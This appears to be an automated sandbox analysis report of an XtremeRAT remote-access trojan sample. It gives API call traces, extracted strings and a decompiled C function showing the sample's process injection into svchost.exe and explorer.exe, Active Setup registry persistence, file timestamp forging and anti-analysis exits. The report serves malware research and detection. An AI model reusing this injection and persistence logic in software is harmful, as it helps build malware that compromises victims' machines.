Part of subcall function 00C84600: ResumeThread.KERNEL32(?,?,?,?,00000004,?,?,?,00000000,?,?,?,?,?,00003000,00000004), ref: 00C8489A

Sleep.KERNEL32(000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000), ref: 00C8A4C0
ExitProcess.KERNEL32(00000000,000003E8,00C91F1C,?,00000000,00000000,00000002,00C90FDC,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A4C7
CloseHandle.KERNEL32(?), ref: 00C8A4DB

Part of subcall function 00C840F8: DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1
Part of subcall function 00C840F8: ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A5D5

Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(user32.dll), ref: 00C88BE5
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00C88BEF
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(wininet.dll), ref: 00C88BF9
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88C03
Part of subcall function 00C88BC0: LoadLibraryA.KERNEL32(Shell32.dll), ref: 00C88C0D
Part of subcall function 00C88BC0: GetLastError.KERNEL32(00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000,00000000), ref: 00C88C25
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,00000000,?,Shell32.dll,advapi32.dll,wininet.dll,urlmon.dll,user32.dll,00000000,00C88E3F,?,00000000,00000001,00000000,00000000), ref: 00C88C33
Part of subcall function 00C88BC0: Sleep.KERNEL32(0000000A,00000000), ref: 00C88DBC
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DD4
Part of subcall function 00C88BC0: CloseHandle.KERNEL32(?), ref: 00C88DDD
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,?,?,0000000A,00000000), ref: 00C88DFF
Part of subcall function 00C88BC0: ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C88E18
Part of subcall function 00C88BC0: ExitProcess.KERNEL32(00000000,00000000,open,?,00000000,00000000,00000000,?,?,0000000A,00000000), ref: 00C88E1F

Sleep.KERNEL32(000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000,00000000,00000000), ref: 00C8A522
TerminateProcess.KERNEL32(?,00000000,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C,00000000), ref: 00C8A53E
GetLastError.KERNEL32(00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000,00000000,00C8F38C,0000181C), ref: 00C8A568
CloseHandle.KERNEL32(00000000), ref: 00C8A576
TerminateProcess.KERNEL32(?,00000000,00000000,00000000,00000000,00C8F38C,000001F4,?,00000002,?,00000000,00C8FAC0,0000020A,00000002,00C8F8B4,00000000), ref: 00C8A58D
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C8A600

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Part of subcall function 00C87B84: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C1D
Part of subcall function 00C87B84: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C87C37
Part of subcall function 00C87B84: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000,00C87D2A,?,00000000,00000000), ref: 00C87C4A
Part of subcall function 00C87B84: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000080,00000000), ref: 00C87C6C
Part of subcall function 00C87B84: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C87C7D
Part of subcall function 00C87B84: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C87C95
Part of subcall function 00C87B84: DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000040,00000000,00000000,00000000,80000000,00000001), ref: 00C87CEE
Part of subcall function 00C87B84: CloseHandle.KERNEL32(00000000), ref: 00C87D0F

Part of subcall function 00C83A54: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C83A65
Part of subcall function 00C83A54: Process32FirstW.KERNEL32(00000000,?), ref: 00C83A7A
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83A94
Part of subcall function 00C83A54: CharUpperW.USER32(00000000), ref: 00C83AA4
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ABF
Part of subcall function 00C83A54: CharUpperW.USER32(?), ref: 00C83ACA
Part of subcall function 00C83A54: Process32NextW.KERNEL32(00000000,?), ref: 00C83AEC
Part of subcall function 00C83A54: CloseHandle.KERNEL32(00000000), ref: 00C83AF6

Part of subcall function 00C89840: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89855
Part of subcall function 00C89840: RegQueryValueExW.ADVAPI32(?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C89876
Part of subcall function 00C89840: RegCloseKey.ADVAPI32(00000000,?,FakeMessage,00000000,?,00000000,?,80000001,SOFTWARE\FakeMessage,00000000,00000001), ref: 00C8988C

Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(user32.dll), ref: 00C898EA
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C898F4
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shell32.dll), ref: 00C898FE
Part of subcall function 00C898DC: LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C89908
Part of subcall function 00C898DC: MessageBoxW.USER32(00000000,?,?,?), ref: 00C899C3

Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88934
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8894D
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88966
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C8897F
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88998
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889B1
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889CA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889E3
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C889FC
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A15
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A2E
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88A40
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A57
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A6C
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A81
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88A96
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AAB
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AC0
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AD5
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AEA
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88AFF
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B14
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B29
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B3E
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B53
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B68
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88B78
Part of subcall function 00C88918: GetTickCount.KERNEL32(00000000), ref: 00C88B8B
Part of subcall function 00C88918: ExitProcess.KERNEL32(00000000), ref: 00C88BB2

Strings

Software\Microsoft\Active Setup\Installed Components\, xrefs: 00C8A11C
.xtr, xrefs: 00C8A3C2
SOFTWARE\XtremeRAT, xrefs: 00C89CC8
local, xrefs: 00C8A3EF
svchost.exe, xrefs: 00C8A196
\Microsoft\Windows\, xrefs: 00C89CDC
.cfg, xrefs: 00C89D01
XTREME, xrefs: 00C8A42F
Mutex, xrefs: 00C8A489
SOFTWARE\, xrefs: 00C8A472
ServerStarted, xrefs: 00C89EFB
explorer.exe, xrefs: 00C8A383
open, xrefs: 00C89C47
XTREMEUPDATE, xrefs: 00C89C5A
InstalledServer, xrefs: 00C8A0D9
SOFTWARE\, xrefs: 00C89EEF, 00C8A0CD
CONFIG, xrefs: 00C89CB4, 00C89D77, 00C89DFB, 00C89E43

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8A024, Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 262
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00C8A024(void* __ebx, void* __edx, void* __eflags) {
				short* _t33;
				void* _t34;
				short* _t37;
				short* _t39;
				short* _t42;
				short* _t48;
				short* _t58;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				void* _t88;
				void* _t90;
				long _t91;
				short* _t100;
				int* _t102;
				void* _t104;
				int* _t107;
				void* _t109;
				intOrPtr _t111;
				int* _t113;
				void* _t115;
				intOrPtr _t117;
				void* _t119;
				intOrPtr* _t126;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr _t169;
				intOrPtr _t173;
				WCHAR* _t176;
				intOrPtr _t184;
				void* _t190;
				signed int _t194;
				void* _t195;
				void* _t224;
				intOrPtr _t225;
				short* _t228;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr* _t239;
				intOrPtr _t243;
				intOrPtr* _t245;
				intOrPtr _t264;
				WCHAR* _t269;
				void* _t272;
				void* _t273;
				intOrPtr _t274;
				void* _t276;
				void* _t278;

				_t276 = __eflags;
				E00C814F0();
				_push(_t273);
				_push(0xc8a09d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				_push(E00C812A4(0x1b) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xb) + 1);
				_push(E00C812A4(6) + 0x7d1);
				_t33 =  *0xc8f898; // 0xc30000
				_t34 = E00C836D8(_t33, _t276);
				_pop(_t224);
				_pop(_t195); // executed
				E00C83BC4(_t34, __ebx, _t195, _t224); // executed
				_pop(_t225);
				 *[fs:eax] = _t225;
				_t37 =  *0xc8f898; // 0xc30000
				E00C83674(_t37);
				_t39 =  *0xc8f898; // 0xc30000
				E00C83674(E00C836D8(_t39, _t276));
				_t42 =  *0xc8f898; // 0xc30000
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t276), _t276, 2, _t42); // executed
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t269 = 0xc8ec8a;
				_t48 =  *0xc8f898; // 0xc30000
				E00C82E48(_t48);
				_t228 =  *0xc8f898; // 0xc30000
				E00C82914(0xc914e8, _t228);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t276));
				E00C82914(0xc91b06, _t53);
				_t58 =  *0xc8f898; // 0xc30000
				_t194 = E00C836D8(_t58, _t276);
				E00C82E48(_t194);
				E00C82914(0xc916f2, _t194);
				if( *0xc8f38a == 1) {
					_t176 = E00C8263C(0, 0, "DSma9HnKaPERSIST"); // executed
					_t269 = _t176;
					_t278 = GetLastError() - 0xb7;
					if(_t278 == 0) {
						CloseHandle(_t269);
					} else {
						CloseHandle(_t269);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t278);
						E00C8291C();
						_t184 =  *0xc8f89c; // 0x19a0000
						E00C82E48(_t184);
						_t264 =  *0xc8f89c; // 0x19a0000
						E00C82914(0xc8fac0, _t264);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
						_t190 =  *0xc8f8ac; // 0x17c
						E00C83CE4(_t190, 0xc8fccc, E00C88EF8);
					}
				}
				E00C81CD8(_t273 - 0x1838, 0x11, 0xc8f2b2);
				_t233 =  *0xc8b0dc; // 0x0
				E00C81DBC( *((intOrPtr*)(_t273 - 0x1838)), _t233);
				if(_t278 != 0) {
					E00C81CD8(_t273 - 0x183c, 0x11, 0xc8f2b2);
					_t235 =  *0xc8b0d8; // 0x0
					E00C81DBC( *((intOrPtr*)(_t273 - 0x183c)), _t235);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						_t74 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t74, 0xc91f1c, _t273);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t162 =  *0xc8f89c; // 0x19a0000
							_t163 = E00C83A54(_t162, 0xc8f8ac);
							__eflags = _t163;
							if(_t163 != 0) {
								_t164 =  *0xc8f8ac; // 0x17c
								 *0xc8f89c = E00C83B10(_t164);
							} else {
								 *0xc8f89c = E00C83094();
							}
							_t166 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t166, 0xc91f1c, _t273);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								_t169 =  *0xc8f89c; // 0x19a0000
								 *0xc8f8ac = E00C83EA8(_t169, 0xc91f1c, _t273);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						_t173 =  *0xc8f89c; // 0x19a0000
						 *0xc8f8ac = E00C83EA8(_t173, 0xc91f1c, _t273);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t272 = 0;
				 *0xc8f8a8 = 0;
				_t279 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t194 =  *0xc8f898; // 0xc30000
					_t269 = E00C833A8(E00C83420(0, _t194, 0), 0xc8a704, _t279);
					if(E00C83960(_t194, E00C82E48(_t194), _t269) == 0) {
						SetFileAttributesW(_t269, 0x80);
						_t281 = E00C82E48(_t269) + _t155;
						E00C82914(0xc91d10, _t269);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t269) + _t155), 0xc91f1c, _t273), 0xc91d10, E00C897F4);
					}
				}
				_t79 = E00C833A8(E00C836D8(0xc918fc, _t281), 0xc90fdc, _t281);
				_t239 =  *0xc8b0f0; // 0xc8e01c
				 *_t239 = _t79;
				_t80 =  *0xc8b0f0; // 0xc8e01c
				_t82 = E00C833A8( *_t80, L".xtr", _t281);
				_t241 =  *0xc8b0f0; // 0xc8e01c
				 *_t241 = _t82;
				_t83 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t83) != 0 && E00C87B84(L"local", _t194, _t272) == 1) {
					_t284 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, "svchost.exe", 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
					}
					_t245 =  *0xc8b0e4; // 0xc8e024
					_t126 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t126, _t194, L"XTREME",  *_t245 - 0x1e, _t269, _t272, _t284);
					E00C82E14(_t273 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t273 - 0x1840,  *((intOrPtr*)(_t273 - 0x1844)), L"SOFTWARE\\", _t284);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t273 - 0x1840))), _t284, 2, "DSma9HnKa");
					_t138 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t138);
					_t140 =  *0xc8b0e8; // 0xc8e020
					_t241 = 0;
					E00C84600( *_t140, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t286 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					_t86 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t86);
					while(1) {
						_t242 = E00C88BC0;
						_t88 =  *0xc8f8ac; // 0x17c
						 *0xc8f8a8 = E00C83CE4(_t88, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4); // executed
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t113 =  *0xc8b0e0; // 0xc8b000
							_t115 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t115,  *_t113);
							_t242 = 0xc91f1c;
							_t117 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t117, 0xc91f1c, _t273);
						}
						_t272 = _t272 + 1;
						_t90 = E00C8263C(0, 0, "DSma9HnKa"); // executed
						_t270 = _t90;
						_t91 = GetLastError();
						__eflags = _t91 - 0xb7;
						_t194 = _t194 & 0xffffff00 | _t91 == 0x000000b7;
						CloseHandle(_t90);
						__eflags = _t194;
						if(_t194 == 0) {
							_t107 =  *0xc8b0e0; // 0xc8b000
							_t109 =  *0xc8f8ac; // 0x17c
							TerminateProcess(_t109,  *_t107);
							_t242 = 0xc91f1c;
							_t111 =  *0xc8f89c; // 0x19a0000
							 *0xc8f8ac = E00C83EA8(_t111, 0xc91f1c, _t273);
						}
						__eflags = _t272 - 7;
						if(_t272 >= 7) {
							break;
						}
						__eflags = _t194 - 1;
						if(_t194 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t194, _t242, _t270, _t272); // executed
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t102 =  *0xc8b0e0; // 0xc8b000
						_t104 =  *0xc8f8ac; // 0x17c
						TerminateProcess(_t104,  *_t102);
						E00C88BC0(_t194, _t270, _t272, __eflags, 0xc8fccc);
					}
					__eflags = _t272 - 7;
					if(_t272 >= 7) {
						__eflags = _t194;
						if(_t194 == 0) {
							_t100 =  *0xc8f898; // 0xc30000
							ShellExecuteW(0, L"open", _t100, 0, 0, 0);
						}
					}
					goto L39;
				} else {
					_t119 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t119);
					E00C840F8(0xc8e07c, _t194, _t241, _t269, _t272);
					E00C88BC0(_t194, _t269, _t272, _t286, 0xc8fccc);
					L39:
					_pop(_t243);
					 *[fs:eax] = _t243;
					_push(0xc8a632);
					E00C81B90(_t273 - 0x1844, 5);
					return E00C81B78(_t273 - 0x14);
				}
			}

0x00c8a024
0x00c8a024
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a082
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a178
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,0000017C), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B4D
Part of subcall function 00C83B10: GetModuleFileNameExW.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,0000017C), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(0000017C,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(0000017C,?,00000000,00000000,?,?,0000017C,?,?,00003000,00000040,0000017C,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(0000017C,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(0000017C), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

